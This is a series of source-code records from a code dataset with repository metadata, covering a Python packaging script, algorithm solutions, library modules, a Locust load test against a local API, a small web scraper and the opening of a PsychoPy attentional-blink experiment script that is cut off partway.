join(dirname(__file__), *names),
encoding=kwargs.get('encoding', 'utf8')
) as fh:
return fh.read()
setup(
name='python-redis-lock',
version='3.3.1',
license='BSD 2-Clause License',
description='Lock context manager implemented via redis SETNX/BLPOP.',
long_description='%s\n%s' % (
re.compile('^.. start-badges.*^.. end-badges', re.M | re.S).sub('', read('README.rst')),
re.sub(':[a-z]+:`~?(.*?)`', r'``\1``', read('CHANGELOG.rst'))
),
author='Ionel Cristian Mărieș',
author_email='[email protected]',
url='https://github.com/ionelmc/python-redis-lock',
packages=find_packages('src'),
package_dir={'': 'src'},
py_modules=[splitext(basename(path))[0] for path in glob('src/*.py')],
include_package_data=True,
zip_safe=False,
classifiers=[
# complete classifier list: http://pypi.python.org/pypi?%3Aaction=list_classifiers
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: Unix',
'Operating System :: POSIX',
'Operating System :: Microsoft :: Windows',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
# uncomment if you test on these interpreters:
# 'Programming Language :: Python :: Implementation :: IronPython',
# 'Programming Language :: Python :: Implementation :: Jython',
# 'Programming Language :: Python :: Implementation :: Stackless',
'Topic :: Utilities',
],
project_urls={
'Documentation': 'https://python-redis-lock.readthedocs.io/',
'Changelog': 'https://python-redis-lock.readthedocs.io/en/latest/changelog.html',
'Issue Tracker': 'https://github.com/ionelmc/python-redis-lock/issues',
},
keywords=[
# eg: 'keyword1', 'keyword2', 'keyword3',
],
python_requires='>=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*',
install_requires=[
'redis>=2.10.0',
],
extras_require={
'django': [
'django-redis>=3.8.0',
]
}
)
| [
"[email protected]"
] | |
1934058aa2a961fccfeb79e210fbfa47f3df6f84 | 67cb31c6ac800dd8a3b6f9cfde21bf619871d0de | /two-sum-closest.py | 7523709d919495e37dda24deade2815c905528a7 | [] | no_license | onestarshang/leetcode_onestar | 93a5fbafaa49bb7f186eafdee5accc031c8893db | 2d6f1235b0ce311a0a2e46f157521430f17140e1 | refs/heads/master | 2021-01-19T20:30:49.169149 | 2017-06-16T05:12:58 | 2017-06-16T05:12:58 | 88,514,095 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 817 | py | # coding=utf8
'''
找到两个数字使得他们和最接近target
nums = [-1, 2, 1, -4],target = 4.
最接近值为 1
'''
class Solution:
# @param {int[]} nums an integer array
# @param {int} target an integer
# @return {int} the difference between the sum and the target
def twoSumClosest(self, nums, target):
# Write your code here
import sys
if not nums:
return -1
nums.sort()
diff = sys.maxint
start, end = 0, len(nums) - 1
while start < end:
if nums[start] + nums[end] < target:
diff = min([diff, target - nums[start] - nums[end]])
start += 1
else:
diff = min([diff, nums[start] + nums[end] - target])
end -= 1
return diff
| [
"[email protected]"
] | |
dbaee83d67af86e8bc68165648dfd407ad7f3b3f | 54ab0f79f5d68f4732ca7d205f72ecef99862303 | /torch/distributed/fsdp/_fsdp_extensions.py | 1f087f44b573970d1e27e823f8ddbd18f756a8ca | [
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | csarofeen/pytorch | a9dd0f8ffa0642d72df2d5e109a8b4d9c2389cbc | e8557ec5e064608577f81e51ccfe7c36c917cb0f | refs/heads/devel | 2023-04-30T02:42:13.558738 | 2023-03-14T00:50:01 | 2023-03-14T00:50:01 | 88,071,101 | 35 | 10 | NOASSERTION | 2023-06-21T17:37:30 | 2017-04-12T16:02:31 | C++ | UTF-8 | Python | false | false | 3,174 | py | from abc import ABC, abstractmethod
from typing import Any, List, Optional, Tuple
import torch
import torch.distributed as dist
from torch.distributed._shard.sharded_tensor.api import ShardedTensor
from torch.distributed._shard.sharded_tensor.shard import Shard
from torch.distributed.fsdp._shard_utils import _create_chunk_sharded_tensor
class FSDPExtensions(ABC):
"""
This enables some customizable hooks to enable composability with tensor
parallelism. To activate these hooks, use :func:`_set_fsdp_extensions` to
set a custom :class:`FSDPExtensions` that implements the hooks.
"""
@abstractmethod
def pre_flatten_transform(
self,
tensor: torch.Tensor,
) -> Tuple[torch.Tensor, Optional[Any]]:
"""E.g. converting ``DistributedTensor`` to local tensor."""
...
@abstractmethod
def post_unflatten_transform(
self,
tensor: torch.Tensor,
param_extension: Any,
) -> torch.Tensor:
"""E.g. converting local tensor to ``DistributedTensor``."""
...
@abstractmethod
def chunk_tensor(
self,
tensor: torch.Tensor,
rank: int,
world_size: int,
num_devices_per_node: int,
pg: dist.ProcessGroup,
) -> torch.Tensor:
"""Shards a tensor to chunks and returns the local chunk."""
...
@abstractmethod
def pre_load_state_dict_transform(
self,
tensor: torch.Tensor,
) -> Tuple[torch.Tensor, List[Shard]]:
"""
This is to be called before loading a *sharded* model state dict and
should return the tensor and list of shards from which to load data.
"""
...
_extensions: Optional[FSDPExtensions] = None
def _set_fsdp_extensions(flattener: FSDPExtensions) -> None:
global _extensions
_extensions = flattener
def _ext_pre_flatten_transform(
tensor: torch.Tensor,
) -> Tuple[torch.Tensor, Optional[Any]]:
if _extensions is not None:
new_tensor, extension = _extensions.pre_flatten_transform(tensor)
if extension is not None:
return new_tensor, extension
return tensor, None
def _ext_post_unflatten_transform(
tensor: torch.Tensor,
param_extension: Any,
) -> torch.Tensor:
if _extensions is not None and param_extension is not None:
return _extensions.post_unflatten_transform(tensor, param_extension)
return tensor
def _ext_chunk_tensor(
tensor: torch.Tensor,
rank: int,
world_size: int,
num_devices_per_node: int,
pg: dist.ProcessGroup,
) -> torch.Tensor:
chunk_tensor_fn = (
_extensions.chunk_tensor
if _extensions is not None
else _create_chunk_sharded_tensor
)
return chunk_tensor_fn(
tensor,
rank,
world_size,
num_devices_per_node,
pg,
)
def _ext_pre_load_state_dict_transform(
tensor: torch.Tensor,
) -> Tuple[torch.Tensor, List[Shard]]:
if _extensions is not None:
return _extensions.pre_load_state_dict_transform(tensor)
assert type(tensor) is ShardedTensor
shards = tensor.local_shards()
return (tensor, shards)
| [
"[email protected]"
] | |
3cf3c1f1d35bc706b4bad88d510bd47402af2346 | c487885e2b43f1dbaa8b06a6ad379550a6d8de16 | /work/022-web-crawl/program.py | 830209341c6466bf3b46af269bdcfc7aa8d367bb | [] | no_license | tbrlpld/100daysofweb-with-python-course | 3395a9d055e7e0d9b04785a48fe7dbd5e8d3a080 | 6b80c01a33d144107fe1bebe402f22cf23fc5408 | refs/heads/master | 2023-01-24T10:57:17.308107 | 2020-09-07T01:02:57 | 2020-09-07T01:02:57 | 215,710,767 | 2 | 0 | null | 2023-01-05T14:54:23 | 2019-10-17T05:34:23 | JavaScript | UTF-8 | Python | false | false | 1,050 | py | import requests
import bs4
from colorama import Fore
def get_html(episode_number: int) -> str:
print(Fore.YELLOW + f"Getting HTML for episode {episode_number}", flush=True)
url = f'https://talkpython.fm/{episode_number}'
resp = requests.get(url)
resp.raise_for_status()
return resp.text
def get_title(html: str, episode_number: int) -> str:
print(Fore.CYAN + f"Getting TITLE for episode {episode_number}", flush=True)
soup = bs4.BeautifulSoup(html, 'html.parser')
header = soup.select_one('h1')
if not header:
return "MISSING"
return header.text.strip()
def get_title_range():
# Please keep this range pretty small to not DDoS my site. ;)
lower_episode_number = 150
higher_episode_number = 170
for n in range(lower_episode_number, higher_episode_number):
html = get_html(n)
title = get_title(html, n)
print(Fore.WHITE + f"Title found: {title}", flush=True)
def main():
get_title_range()
print("Done.")
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
f6719e445232e1c84992d697f3fcc76afaf4c267 | 7e96ba20c25c6fb56af6ccd36b3b6d68df6a081c | /Kyle_Marienthal/DJANGO/wishlist/apps/wish_app/urls.py | d928425723734900ca75a11317fa753b0ac948ee | [] | no_license | CodingDojoDallas/python_september_2017 | 9d8cd74131a809bc6b13b7f465594cf8b1e2fd75 | f9f2f7b39bf9c4fceda3df5dc7424164aa5d5df5 | refs/heads/master | 2021-01-23T08:52:22.899994 | 2017-10-30T17:00:55 | 2017-10-30T17:00:55 | 102,558,291 | 2 | 14 | null | 2018-01-13T05:28:34 | 2017-09-06T03:28:38 | Python | UTF-8 | Python | false | false | 557 | py | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^dashboard$', views.dashboard, name='dashboard'),
url(r'^wish_item$', views.wish_item, name='wish_item'),
url(r'^create$', views.create_item, name='create_item'),
url(r'^show_wish/(?P<id>\d+)$', views.show_wish, name='show_wish'),
url(r'^delete_wish/(?P<id>\d+)$', views.delete_wish, name='delete_wish'),
url(r'^remove_wish/(?P<id>\d+)$', views.remove_wish, name='remove_wish'),
url(r'^add_wish/(?P<id>\d+)$', views.add_wish, name='add_wish'),
]
| [
"[email protected]"
] | |
7bd4767c83974c3317ae920f888f7a5b4a9dff45 | d094ba0c8a9b1217fbf014aa79a283a49aabe88c | /env/lib/python3.6/site-packages/sympy/logic/algorithms/dpll.py | 62041c20519eb86cbcd92273b4ee8d2ed89d4101 | [
"Apache-2.0"
] | permissive | Raniac/NEURO-LEARN | d9274e0baadd97bb02da54bdfcf6ca091fc1c703 | 3c3acc55de8ba741e673063378e6cbaf10b64c7a | refs/heads/master | 2022-12-25T23:46:54.922237 | 2020-09-06T03:15:14 | 2020-09-06T03:15:14 | 182,013,100 | 9 | 2 | Apache-2.0 | 2022-12-09T21:01:00 | 2019-04-18T03:57:00 | CSS | UTF-8 | Python | false | false | 9,253 | py | """Implementation of DPLL algorithm
Further improvements: eliminate calls to pl_true, implement branching rules,
efficient unit propagation.
References:
- http://en.wikipedia.org/wiki/DPLL_algorithm
- https://www.researchgate.net/publication/242384772_Implementations_of_the_DPLL_Algorithm
"""
from __future__ import print_function, division
from sympy.core.compatibility import range
from sympy import default_sort_key
from sympy.logic.boolalg import Or, Not, conjuncts, disjuncts, to_cnf, \
to_int_repr, _find_predicates
from sympy.logic.inference import pl_true, literal_symbol
def dpll_satisfiable(expr):
"""
Check satisfiability of a propositional sentence.
It returns a model rather than True when it succeeds
>>> from sympy.abc import A, B
>>> from sympy.logic.algorithms.dpll import dpll_satisfiable
>>> dpll_satisfiable(A & ~B)
{A: True, B: False}
>>> dpll_satisfiable(A & ~A)
False
"""
clauses = conjuncts(to_cnf(expr))
if False in clauses:
return False
symbols = sorted(_find_predicates(expr), key=default_sort_key)
symbols_int_repr = set(range(1, len(symbols) + 1))
clauses_int_repr = to_int_repr(clauses, symbols)
result = dpll_int_repr(clauses_int_repr, symbols_int_repr, {})
if not result:
return result
output = {}
for key in result:
output.update({symbols[key - 1]: result[key]})
return output
def dpll(clauses, symbols, model):
"""
Compute satisfiability in a partial model.
Clauses is an array of conjuncts.
>>> from sympy.abc import A, B, D
>>> from sympy.logic.algorithms.dpll import dpll
>>> dpll([A, B, D], [A, B], {D: False})
False
"""
# compute DP kernel
P, value = find_unit_clause(clauses, model)
while P:
model.update({P: value})
symbols.remove(P)
if not value:
P = ~P
clauses = unit_propagate(clauses, P)
P, value = find_unit_clause(clauses, model)
P, value = find_pure_symbol(symbols, clauses)
while P:
model.update({P: value})
symbols.remove(P)
if not value:
P = ~P
clauses = unit_propagate(clauses, P)
P, value = find_pure_symbol(symbols, clauses)
# end DP kernel
unknown_clauses = []
for c in clauses:
val = pl_true(c, model)
if val is False:
return False
if val is not True:
unknown_clauses.append(c)
if not unknown_clauses:
return model
if not clauses:
return model
P = symbols.pop()
model_copy = model.copy()
model.update({P: True})
model_copy.update({P: False})
symbols_copy = symbols[:]
return (dpll(unit_propagate(unknown_clauses, P), symbols, model) or
dpll(unit_propagate(unknown_clauses, Not(P)), symbols_copy, model_copy))
def dpll_int_repr(clauses, symbols, model):
"""
Compute satisfiability in a partial model.
Arguments are expected to be in integer representation
>>> from sympy.logic.algorithms.dpll import dpll_int_repr
>>> dpll_int_repr([{1}, {2}, {3}], {1, 2}, {3: False})
False
"""
# compute DP kernel
P, value = find_unit_clause_int_repr(clauses, model)
while P:
model.update({P: value})
symbols.remove(P)
if not value:
P = -P
clauses = unit_propagate_int_repr(clauses, P)
P, value = find_unit_clause_int_repr(clauses, model)
P, value = find_pure_symbol_int_repr(symbols, clauses)
while P:
model.update({P: value})
symbols.remove(P)
if not value:
P = -P
clauses = unit_propagate_int_repr(clauses, P)
P, value = find_pure_symbol_int_repr(symbols, clauses)
# end DP kernel
unknown_clauses = []
for c in clauses:
val = pl_true_int_repr(c, model)
if val is False:
return False
if val is not True:
unknown_clauses.append(c)
if not unknown_clauses:
return model
P = symbols.pop()
model_copy = model.copy()
model.update({P: True})
model_copy.update({P: False})
symbols_copy = symbols.copy()
return (dpll_int_repr(unit_propagate_int_repr(unknown_clauses, P), symbols, model) or
dpll_int_repr(unit_propagate_int_repr(unknown_clauses, -P), symbols_copy, model_copy))
### helper methods for DPLL
def pl_true_int_repr(clause, model={}):
"""
Lightweight version of pl_true.
Argument clause represents the set of args of an Or clause. This is used
inside dpll_int_repr, it is not meant to be used directly.
>>> from sympy.logic.algorithms.dpll import pl_true_int_repr
>>> pl_true_int_repr({1, 2}, {1: False})
>>> pl_true_int_repr({1, 2}, {1: False, 2: False})
False
"""
result = False
for lit in clause:
if lit < 0:
p = model.get(-lit)
if p is not None:
p = not p
else:
p = model.get(lit)
if p is True:
return True
elif p is None:
result = None
return result
def unit_propagate(clauses, symbol):
"""
Returns an equivalent set of clauses
If a set of clauses contains the unit clause l, the other clauses are
simplified by the application of the two following rules:
1. every clause containing l is removed
2. in every clause that contains ~l this literal is deleted
Arguments are expected to be in CNF.
>>> from sympy import symbols
>>> from sympy.abc import A, B, D
>>> from sympy.logic.algorithms.dpll import unit_propagate
>>> unit_propagate([A | B, D | ~B, B], B)
[D, B]
"""
output = []
for c in clauses:
if c.func != Or:
output.append(c)
continue
for arg in c.args:
if arg == ~symbol:
output.append(Or(*[x for x in c.args if x != ~symbol]))
break
if arg == symbol:
break
else:
output.append(c)
return output
def unit_propagate_int_repr(clauses, s):
"""
Same as unit_propagate, but arguments are expected to be in integer
representation
>>> from sympy.logic.algorithms.dpll import unit_propagate_int_repr
>>> unit_propagate_int_repr([{1, 2}, {3, -2}, {2}], 2)
[{3}]
"""
negated = {-s}
return [clause - negated for clause in clauses if s not in clause]
def find_pure_symbol(symbols, unknown_clauses):
"""
Find a symbol and its value if it appears only as a positive literal
(or only as a negative) in clauses.
>>> from sympy import symbols
>>> from sympy.abc import A, B, D
>>> from sympy.logic.algorithms.dpll import find_pure_symbol
>>> find_pure_symbol([A, B, D], [A|~B,~B|~D,D|A])
(A, True)
"""
for sym in symbols:
found_pos, found_neg = False, False
for c in unknown_clauses:
if not found_pos and sym in disjuncts(c):
found_pos = True
if not found_neg and Not(sym) in disjuncts(c):
found_neg = True
if found_pos != found_neg:
return sym, found_pos
return None, None
def find_pure_symbol_int_repr(symbols, unknown_clauses):
"""
Same as find_pure_symbol, but arguments are expected
to be in integer representation
>>> from sympy.logic.algorithms.dpll import find_pure_symbol_int_repr
>>> find_pure_symbol_int_repr({1,2,3},
... [{1, -2}, {-2, -3}, {3, 1}])
(1, True)
"""
all_symbols = set().union(*unknown_clauses)
found_pos = all_symbols.intersection(symbols)
found_neg = all_symbols.intersection([-s for s in symbols])
for p in found_pos:
if -p not in found_neg:
return p, True
for p in found_neg:
if -p not in found_pos:
return -p, False
return None, None
def find_unit_clause(clauses, model):
"""
A unit clause has only 1 variable that is not bound in the model.
>>> from sympy import symbols
>>> from sympy.abc import A, B, D
>>> from sympy.logic.algorithms.dpll import find_unit_clause
>>> find_unit_clause([A | B | D, B | ~D, A | ~B], {A:True})
(B, False)
"""
for clause in clauses:
num_not_in_model = 0
for literal in disjuncts(clause):
sym = literal_symbol(literal)
if sym not in model:
num_not_in_model += 1
P, value = sym, not isinstance(literal, Not)
if num_not_in_model == 1:
return P, value
return None, None
def find_unit_clause_int_repr(clauses, model):
"""
Same as find_unit_clause, but arguments are expected to be in
integer representation.
>>> from sympy.logic.algorithms.dpll import find_unit_clause_int_repr
>>> find_unit_clause_int_repr([{1, 2, 3},
... {2, -3}, {1, -2}], {1: True})
(2, False)
"""
bound = set(model) | set(-sym for sym in model)
for clause in clauses:
unbound = clause - bound
if len(unbound) == 1:
p = unbound.pop()
if p < 0:
return -p, False
else:
return p, True
return None, None
| [
"[email protected]"
] | |
68bd7d76d90c36e16e1c519cefc8671496e0247f | b29589f95734682663ae6cd40ab00eb0a94b6d87 | /longwave/lblnew_20160916/study__g1_threshold/n2o/conc_3.2e-07/band03a_wn_540_620/nv_200/dv_0.005/ng_3/g_ascending_k_descending/refPTs_P_1_T_250__P_500_T_250/ng_refs_1__2/ng_adju_0__0/getabsth_auto__auto/absth_dlogN_uniform__dlogN_uniform/klin_2.22e-20/atmpro_mls/wgt_k_1/wgt_0.9__0.5_0.95/wgt_flux_1/w_diffuse_1.8__1.66_1.8/option_compute_ktable_1/option_compute_btable_0/crd_d62b618/param.py | 1efa8ff08b38418af19888072c3fb5e9fe5cb613 | [] | no_license | qAp/offline_radiation_notebooks | 02c2b2414ef1410f235776001a668f7df0b9f1cf | 44fb62391c27e4e314ad68ae3e91f6111b3172c5 | refs/heads/master | 2020-04-15T14:31:34.675322 | 2019-07-08T04:45:54 | 2019-07-08T04:45:54 | 43,118,324 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 871 | py | DIR_FORTRAN = '/chia_cluster/home/jackyu/radiation/crd/LW/examples/separate_g_groups/study__lblnew_g1_threshold/n2o/conc_3.2e-07/band03a_wn_540_620/nv_200/dv_0.005/ng_3/g_ascending_k_descending/refPTs_P_1_T_250__P_500_T_250/ng_refs_1__2/ng_adju_0__0/getabsth_auto__auto/absth_dlogN_uniform__dlogN_uniform/klin_2.22e-20/atmpro_mls/wgt_k_1/wgt_0.9__0.5_0.95/wgt_flux_1/w_diffuse_1.8__1.66_1.8/option_compute_ktable_1/option_compute_btable_0/crd_d62b618'
PARAM = {'molecule': 'n2o', 'band': '3a', 'commitnumber': 'd62b618', 'vmin': 540, 'vmax': 620, 'dv': 0.005, 'nv': 200, 'ref_pts': [(1, 250), (500, 250)], 'ng_refs': [1, 2], 'ng_adju': [0, 0], 'klin': 2.22e-20, 'option_wgt_k': 1, 'wgt': [(0.9,), (0.5, 0.95)], 'w_diffuse': [(1.8,), (1.66, 1.8)], 'option_wgt_flux': 1, 'atmpro': 'mls', 'tsfc': 294, 'conc': 3.2e-07, 'option_compute_btable': 0, 'option_compute_ktable': 1} | [
"[email protected]"
] | |
2569b26ea00537888870b42898de01514eb98c50 | a873f3cd46a10ad879fc56d78e1f533d8bf486c0 | /vova_project/vova_resful/接口/loc3.py | 1ebd4430df919e0ff85e243af0f32555921ed583 | [] | no_license | shenhaiyu0923/resful | d0301b39363e6b3d3659f62fa4a9b2532ebcd225 | 1e66cae7d68fa231794776953cc1a5e999bf36c6 | refs/heads/master | 2021-07-08T20:46:57.300298 | 2021-06-01T08:17:27 | 2021-06-01T08:17:27 | 244,308,016 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,299 | py | from locust import HttpLocust, TaskSequence, task, TaskSet
from pprint import pprint
from random import randint
import os
'''
1. 实现登陆基本功能,输出响应,脚本正确
2. 多用户随机登陆:在doLogin方法里构造随机数据。 -LR:参数化 Jmeter : 参数化
3. 添加初始化方法on_start:类似于构造方法,每个用户只运行一次
4. 添加检查点:断言
- 在请求方法中设置catch_response参数为True
- 调用success和feature方法标注成功或失败
'''
# 任务类
#class TestLogin(TaskSet):TaskSequence 继承自TaskSet
class TestLogin(TaskSequence):
#任务开始前先自动执行的
def on_start(self):
# 请求正文接受的是字典,username=byhy&passwprd=88888888
self.loginnData = [
{'username': 'byhy', 'password': '88888888'},
{'username': 'byhy1', 'password': '888888881'},]
print('------on_start-------')
@task
def doLogin(self):
# 1000以内的随机数,对用户数据长度3进行取余数,0,1,
ranIndex = randint(1,1000) % len(self.loginnData)
data = {
"username": "byhy",
"password": "88888888",
}
url = 'http://127.0.0.1:8001/api/mgr/signin'
response = self.client.post(url,data=self.loginnData[ranIndex],catch_response = True)# catch_response = True 捕获响应
if '"ret": 0' in response.text:
response.success()
else:
response.failure(' Can not login!')
print(self.loginnData[ranIndex]['username'])
print(response.text)
class WebSite(HttpLocust):
task_set = TestLogin
min_wait = 1000
max_wait = 3000
if __name__ == "__main__":
os.system("locust -f loc3.py --web-host=127.0.0.1")
'''
class UserBehavior(TaskSequence):
@task(1)
def byhy(self):
data = {
"username": "byhy",
"password": "88888888",
}
url = 'http://127.0.0.1:8001/api/mgr/signin'
r = self.client.post(url, data=data)
pprint(r.json())
class WebsiteUser(HttpLocust):
task_set = UserBehavior
min_wait = 1000
max_wait = 3000
if __name__ == "__main__":
import os
os.system("locust -f loc3.py --web-host=127.0.0.1")
''' | [
"[email protected]"
] | |
96702d0e44ae4a9a31a61c1639af7cc8917fd069 | 7e72e16f43170749dada023624a88fd622727639 | /jdcloud_sdk/services/monitor/models/DescribeAlarmingRulesEnd.py | 05a8f48f0d26c1478fdc96f2918611bc48513a30 | [
"Apache-2.0"
] | permissive | jdcloud-demo/jdcloud-sdk-python | 4dc1e814217df16c5f60f5e4b3f8260b770f9d2b | fddc2af24031c597948b8b8091978ac7e01a2695 | refs/heads/master | 2020-07-11T18:19:59.688112 | 2019-08-23T05:55:18 | 2019-08-23T05:55:18 | 204,613,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,320 | py | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
class DescribeAlarmingRulesEnd(object):
def __init__(self, alarmHistoryList=None, numberPages=None, numberRecords=None, pageNumber=None, pageSize=None):
"""
:param alarmHistoryList: (Optional) 未恢复的报警
:param numberPages: (Optional) 总页数
:param numberRecords: (Optional) 总记录数
:param pageNumber: (Optional) 当前页码
:param pageSize: (Optional) 分页大小
"""
self.alarmHistoryList = alarmHistoryList
self.numberPages = numberPages
self.numberRecords = numberRecords
self.pageNumber = pageNumber
self.pageSize = pageSize
| [
"[email protected]"
] | |
728e0e56dc869b0274f7b832fdc35d1ddddf9393 | 57da072d37d59f00301e7483fdee067a244f24ce | /autobots/spider/test.py | 16cdf605c823d2c3aa45aba5b337bb417a119592 | [] | no_license | KonroyZhu/auto_project | 47919879e5f4b78ef082e7e76be2c2bb958018d3 | c0f10e8ee24342ede402a5694a20d160322eb8c1 | refs/heads/master | 2021-03-30T21:17:46.470105 | 2018-03-10T09:41:44 | 2018-03-10T09:41:44 | 124,640,575 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
url="https://www.baidu.com/"
driver=webdriver.PhantomJS()
dcap=dict(DesiredCapabilities.PHANTOMJS)
dcap["phantomjs.page.settings.userAgent"]=(" Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0")
driver=webdriver.PhantomJS(desired_capabilities=dcap)
driver.implicitly_wait(20)
driver.get(url=url) | [
"[email protected]"
] | |
cee42ce181f4e1b5dfe899aa01006622846891c3 | 1a6c2be5ff1a8364c97a1ede23c824b2579ecf79 | /tfx/tools/cli/kubeflow_v2/commands/run_test.py | 46bb0730fdc04d5a2c3f65c8b83d3ee5b7b8f0ea | [
"Apache-2.0"
] | permissive | 418sec/tfx | fa1a4690df2178e9c6bd24f97df0bbde7436df95 | df1529c91e52d442443eca5968ff33cf0a38dffa | refs/heads/master | 2023-04-18T12:25:38.098958 | 2021-04-28T16:11:00 | 2021-04-28T16:11:00 | 333,769,030 | 2 | 1 | Apache-2.0 | 2021-04-28T16:11:01 | 2021-01-28T13:35:14 | null | UTF-8 | Python | false | false | 1,587 | py | # Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for Kubeflow V2 run commands."""
# TODO(b/169094706): Add kokoro test coverage for this test.
import codecs
import locale
import os
import sys
from click import testing as click_testing
import mock
import tensorflow as tf
# Fake GCP project ID, API key, docker image tag and job name under test.
# _TEST_API_KEY = 'fake-api-key'
# _TEST_PROJECT_ID = 'fake-gcp-project'
# _TEST_IMAGE = 'gcr.io/fake-image:fake-tag'
# _TEST_JOB_NAME = 'taxi-pipeline-1'
# TODO(b/169094706): re-surrect the tests when the unified client becomes
# available.
class RunTest(tf.test.TestCase):
def setUp(self):
# Change the encoding for Click since Python 3 is configured to use ASCII as
# encoding for the environment.
super().setUp()
if codecs.lookup(locale.getpreferredencoding()).name == 'ascii':
os.environ['LANG'] = 'en_US.utf-8'
self.runner = click_testing.CliRunner()
sys.modules['handler_factory'] = mock.Mock()
if __name__ == '__main__':
tf.test.main()
| [
"[email protected]"
] | |
ea2aa7a6be899b5c63b9a6e52a3e81d525669b50 | 0ae05ab700b3a7678186d34dfb602cfe347b1377 | /AB_spatial/code/Adi_29Nov2018_10-15.py | a345273206124586a22d20773cc04768bee0372e | [
"CC-BY-4.0",
"MIT"
] | permissive | Adibuoy23/spatio_temporal_information_processing | 20c68cae4e673171c95867e2a2b444894d814104 | a16485aa2e68b1c12043a29b5c1faf56db0ae10f | refs/heads/master | 2021-08-06T13:17:24.662844 | 2020-04-22T23:53:56 | 2020-04-22T23:53:56 | 157,260,014 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 51,182 | py | # Alex Holcombe [email protected]
# See the README.md for more information: https://github.com/alexholcombe/attentional-blink/blob/master/README.md
# git remote add origin https://github.com/alexholcombe/attentional-blink.git
from __future__ import print_function
from psychopy import monitors, visual, event, data, logging, core, sound, gui
import psychopy.info
import numpy as np
from math import atan, log, ceil
from copy import deepcopy
import time
import sys
import os
import pylab
from random import shuffle
try:
from noiseStaircaseHelpers import printStaircase, toStaircase, outOfStaircase, createNoise, plotDataAndPsychometricCurve
except ImportError:
print('Could not import from noiseStaircaseHelpers.py (you need that file to be in the same directory)')
try:
import stringResponse
except ImportError:
print('Could not import strongResponse.py (you need that file to be in the same directory)')
descendingPsycho = True
tasks = ['T1', 'T1T2']
task = tasks[1]
# THINGS THAT COULD PREVENT SUCCESS ON A STRANGE MACHINE
# same screen or external screen? Set scrn=0 if one screen. scrn=1 means display stimulus on second screen.
# widthPix, heightPix
quitFinder = False # if checkRefreshEtc, quitFinder becomes True
autopilot = False
demo = False # False
exportImages = False # quits after one trial
subject = 'Adi' # user is prompted to enter true subject name
if autopilot:
subject = 'auto'
if os.path.isdir('.'+os.sep+'data'):
dataDir = 'data'
codeDir = 'code'
logsDir = 'logs'
else:
print('"data" directory does not exist, so saving data in present working directory')
dataDir = '.'
timeAndDateStr = time.strftime("%d%b%Y_%H-%M", time.localtime())
showRefreshMisses = True # flicker fixation at refresh rate, to visualize if frames missed
feedback = False
autoLogging = False
if demo:
refreshRate = 60. # 100
staircaseTrials = 25
prefaceStaircaseTrialsN = 20 # 22
# will be recycled / not all used, as needed
prefaceStaircaseNoise = np.array([5, 20, 20, 20, 50, 50, 50, 5, 80, 80, 80, 5, 95, 95, 95])
threshCriterion = 0.58
bgColor = [-.7, -.7, -.7] # [-1,-1,-1]
cueColor = [1., 1., 1.]
letterColor = [1., 1., 1.]
cueRadius = 1.5 # 6 deg, as in Martini E2 Letters should have height of 2.5 deg
widthPix = 1680 # monitor width in pixels of Agosta
heightPix = 1050 # 800 #monitor height in pixels
monitorwidth = 47.2 # monitor width in cm
scrn = 0 # 0 to use main screen, 1 to use external screen connected to computer
fullscr = False # True to use fullscreen, False to not. Timing probably won't be quite right if fullscreen = False
allowGUI = False
if demo:
monitorwidth = 47.2 # 18.0
if exportImages:
widthPix = 1680
heightPix = 1050
monitorwidth = 47.2
fullscr = False
scrn = 0
if demo:
scrn = 0
fullscr = False
widthPix = 1680
heightPix = 1050
monitorname = 'testMonitor'
allowGUI = True
viewdist = 65.0 # cm
INS_MSG = "Welcome! Thank you for agreeing to participate in this study.\n\n"
INS_MSG += "You will be presented with two numbers embedded in a Rapid Stream of letters. Your task is to identify the two numbers.\n\n"
INS_MSG += "Your are required to fixate in the center during the experiment.\n\n"
INS_MSG += "The RSVP stream can appear anywhere along the horizontal axis in the visual field.\n\n"
INS_MSG += "Once you've identified the numbers, type them out on the keyboard after the trial ends.\n\n"
INS_MSG += "If you're feeling uncomfortable, you can press ESC key any time to stop the experiment.\n\n"
INS_MSG += "Press any key when you are ready to begin the experiment.\n\n"
pixelperdegree = widthPix / (atan(monitorwidth/viewdist) / np.pi*180)
print('pixelperdegree=', pixelperdegree)
# create a dialog from dictionary
infoFirst = {'Do staircase (only)': False, 'Check refresh etc': False,
'Fullscreen (timing errors if not)': False, 'Screen refresh rate': 60}
OK = gui.DlgFromDict(dictionary=infoFirst,
